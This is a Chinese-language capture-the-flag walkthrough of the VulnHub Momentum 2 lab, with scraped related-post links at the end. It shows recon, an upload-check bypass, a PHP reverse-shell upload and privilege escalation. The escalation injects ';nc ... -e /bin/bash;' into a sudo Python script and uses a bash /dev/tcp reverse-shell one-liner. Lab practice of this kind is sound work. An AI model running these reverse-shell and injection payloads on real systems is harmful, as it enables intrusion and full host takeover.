一、准备工作

靶机下载地址:Momentum: 2 ~ VulnHub

1.查看kali的ip

使用命令ifconfig

2.使用nmap命令

nmap 192.168.101.0/24

查看开放的端口和协议:nmap -sV 192.168.101.114

二、信息收集

1.使用gobuster,寻找隐藏的网站

gobuster dir -u http://192.168.101.114/ -x html,php,txt,php.bak,bak -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

发现一个可以上传文件的网站:http://192.168.101.114/dashboard.html

2.利用bp抓包软件将文件上传

上传一句话木马php文件

访问http://192.168.101.114/ajax.php.bak看到一个文件,如果参数为secure,值等于val1d就允许上传pdf、php、txt文件

抓包添加cookie与参数

cookie: admin=&G6u@B6uDXMq&Ms

-----------------------------150269877033212106221702063904

Content-Disposition: form-data; name="secure";

val1d

还有将一句话木马改成反向连接木马,自动生成的反向连接木马地址:https://forum.ywhack.com/reverse-shell/将自动生成的php反向连接脚本替换掉一句话木马

将修改好的数据发送到intruder里面进行爆破

添加要爆破的参数将事先写好的26大写英文字母字典添加到Payload Options爆破返回的长度一样,查看返回的参数哪个有1

将数据上传,可以发现上传成功

三、提权

1.利用php反向连接脚本连接靶机

(1)在kali开启监听功能:nc -lvvp 8888

(2)访问刚才上传的反向连接脚本

(3)看一看kali那边连接情况,已经反向连接成功了

(4)第一个flag

(5)ssh远程连接

发现一个用户密码: athena、myvulnerableapp*,使用命令:ssh athena@192.168.101.114

(6)提权payload

查看该用户的权限并且该用户能够利用引用root相关的执行文件有哪些

1.cat /home/team-tasks/cookie-gen.py

将反弹root权限的shell命令存入seed变量执行

echo "bash -c 'exec bash -i &>/dev/tcp/192.168.101.114/4444 <&1'" | base64

1.sudo -u root /usr/bin/python3 /home/team-tasks/cookie-gen.py

2.;nc 192.168.101.10 4444 -e /bin/bash;

3.反向连接:nc -lnvp 4444

4.优化命令执行终端,执行下面命令进入python交互式(注意要下载python环境才能运行):

python -c ‘import pty;pty.spawn(“/bin/bash”)’

5.第二flag

靶场练习第二十二天~vulnhub靶场之Momentum-2相关推荐

  1. 靶场练习第十二天~vulnhub靶场之dc-4

    一.准备工作 1.靶机下载链接 链接: 百度网盘 请输入提取码 提取码: 3hq4 2.用ifconfig查看kali的ip 二.信息收集 1.nmap的信息收集 (1)主机发现 命令:nmap 19 ...

  2. 靶场练习第二天~vulnhub靶场之 THE PLANETS: EARTH

    前期准备: 靶机下载链接: https://pan.baidu.com/s/1_w8OZOPVsQaojq2rnKcdRA 提取码: gguw kali攻击机ip:192.168.101.10 靶机地 ...

  3. 靶场练习第一天~vulnhub靶场之Me-and-My-Girlfriend-1

    兄弟们第一天打vulnhub靶场,我kali连靶场ip都扫不到,泪奔了,不说了开整 注意: vm虚拟机里面的编辑下面的虚拟机网络编辑器,把除了NAT模式外的模式,其他模式不启动. 至于为什么要这样操作 ...

  4. 靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie

    一.环境搭建 靶官网机下载地址:Funbox: Scriptkiddie ~ VulnHub 百度云盘下载链接: 百度网盘 请输入提取码 提取码: i4a9 二.信息收集 1.nmap命令扫描靶机 先 ...

  5. vulnhub靶场{GoldenEye-v1靶场实战}

    远赴人间今鸿雁.一睹人间盛世言. GoldenEye-v1 环境: vulnhub靶场链接: https://www.vulnhub.com/entry/goldeneye-1,240/ kali主机 ...

  6. Vulnhub靶场题解

    Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...

  7. VulnHub靶场LupinOne

    VulnHub靶场LupinOne 这个靶场是一个很好的练习环境,整套渗透流程,用来模拟环境非常合适 链接:https://pan.baidu.com/s/1lX79juqZJl4roKakTwWQx ...

  8. VulnHub靶场系列:Flick

    VulnHub靶场系列:Flick 今天意外看到一个VulnHub上的一个靶场的WriteUp,觉得挺有意思,所以自己试着做一遍并记录下来. 环境部署: 下载靶场并导入到VMware中: https: ...

  9. Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)

    Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权) 靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/ 下载将其导入VMware ...

最新文章

  1. Python2和Python3除法差别
  2. android中变量作用域,在 Android 和 Hilt 中限定作用域
  3. 集合框架(一) ----------Map集合遍历的方法
  4. 一步步编写操作系统 24 编写内核加载器
  5. *【POJ - 3659】Cell Phone Network (树形dp,最小支配集)
  6. ubuntun系统mysql数据库同步_Canal 实现 Mysql数据库实时数据同步
  7. oracle多表查询while,oracle while的用法示例分享
  8. python可以做exe文件吗_手动制作python的exe可执行程序
  9. Himawari-8数据下载及命名
  10. 安装win10+黑苹果双系统零基础教程
  11. python ipo模型是指什么?
  12. 基于单片机的超市储物柜设计_一种超市用储物柜的制作方法
  13. 统计篇(五)-- 随机变量、样本、统计量
  14. hadoop2.4.1配置时出现域名解析失败的解决方法
  15. (21)恢复数据(recovery)时间和撤销数据(removal)时间
  16. 在计算机领域,美国信息交换标准代码的缩写符号是.,计算机基础在线作业.docx...
  17. 科林明伦杯哈尔滨理工大学第六届程序设计团队赛-Team模拟
  18. PHP中终止程序输出的exit和die
  19. [附源码]Java计算机毕业设计SSM大学生项目众筹系统
  20. Python批量获取高校基本信息

热门文章

  1. mysql递归查询所有上下节点_非递归打印二叉树的所有路径,保存父节点和孩子节点到底有啥差别...
  2. java四神兽_SpringCloud五大神兽之Eureka
  3. python简单实用案例_Ajax的简单实用实例代码
  4. springboot mysql时区设置_java/springboot/mysql时区问题解决方案
  5. html中给div设置的属性怎么样才能拿得到_HTML与CSS结合的三种方式:优先级比较...
  6. 太和二中计算机考试,安徽省太和二中高二数学下册期末考试试题精选
  7. 下列不属于html5语义元素,HTML5 新的语义元素
  8. php js 图片旋转,jQuery实现可以控制图片旋转角度效果
  9. cefsharp重写默认js弹窗(alert/confirm/prompt)
  10. Pyqt5+python+ErIC6+QT designer